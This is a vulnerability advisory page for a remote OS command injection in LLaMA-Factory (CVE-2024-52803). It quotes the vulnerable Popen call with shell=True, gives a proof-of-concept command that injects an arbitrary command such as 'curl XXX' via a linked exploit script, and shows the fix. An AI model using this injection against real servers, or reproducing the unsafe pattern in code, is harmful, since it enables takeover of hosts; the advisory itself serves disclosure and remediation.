Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1oajN3LXdyaDQtNDR2cM4ABBnB
LLama Factory Remote OS Command Injection Vulnerability
Summary
A critical remote OS command injection vulnerability has been identified in the Llama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on the host system. The issue is caused by insecure usage of the Popen
function with shell=True
, coupled with unsanitized user input. Immediate remediation is required to mitigate the risk.
Affected Version
Llama Factory versions <=0.9.0 are affected by this vulnerability.
Impact
Exploitation of this vulnerability allows attackers to:
- Execute arbitrary OS commands on the server.
- Potentially compromise sensitive data or escalate privileges.
- Deploy malware or create persistent backdoors in the system.
This significantly increases the risk of data breaches and operational disruption.
Root Cause
The vulnerability originates from the training process where the output_dir
value, obtained from the user input, is injected into the popen function without any sanitization. Furthermore, popen is invoked in a unsafe way by enabling the interact shell (shell=True
), leading to remote OS command injection vulnerability.
Vulnerable snippet:
# https://github.com/hiyouga/LLaMA-Factory/blob/bd639a137e6f46e1a0005cc91572f5f1ec894f74/src/llamafactory/webui/runner.py#L304-L323
def _launch(self, data: Dict["Component", Any], do_train: bool) -> Generator[Dict["Component", Any], None, None]:
...
args = self._parse_train_args(data) if do_train else self._parse_eval_args(data)
...
self.trainer = Popen(f"llamafactory-cli train {save_cmd(args)}", env=env, shell=True)
yield from self.monitor()
Proof of Concept (PoC)
Steps to Reproduce
-
Deploy llama factory
-
Execute the exploitation script from: https://gist.github.com/superboy-zjc/f2d2b93ae511c445ba97e144b70e534d
python3 llama-factory-rce.py --url http://127.0.0.1:7861 --cmd "curl XXX" --trace
Bad actors are able to execute any OS command as they want.
Remediation Recommendations
Avoid using shell=True
in Popen
.
- Instead, pass the command and its arguments as a list. This prevents user inputs from being executed as part of a shell command.
cmd = [
"llamafactory-cli",
"train",
*save_cmd(args).split(),
]
self.trainer = Popen(cmd, env=env)
Permalink: https://github.com/advisories/GHSA-hj3w-wrh4-44vpJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN3LXdyaDQtNDR2cM4ABBnB
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 month ago
Updated: about 1 month ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Percentage: 0.00045
EPSS Percentile: 0.1735
Identifiers: GHSA-hj3w-wrh4-44vp, CVE-2024-52803
References:
- https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-hj3w-wrh4-44vp
- https://github.com/hiyouga/LLaMA-Factory/commit/b3aa80d54a67da45e9e237e349486fb9c162b2ac
- https://github.com/advisories/GHSA-hj3w-wrh4-44vp
Blast Radius: 1.0
Affected Packages
pypi:llamafactory
Dependent packages: 0Dependent repositories: 0
Downloads: 2,381 last month
Affected Version Ranges: <= 0.9.0
Fixed in: 0.9.1
All affected versions: 0.7.1, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.9.0
All unaffected versions: 0.9.1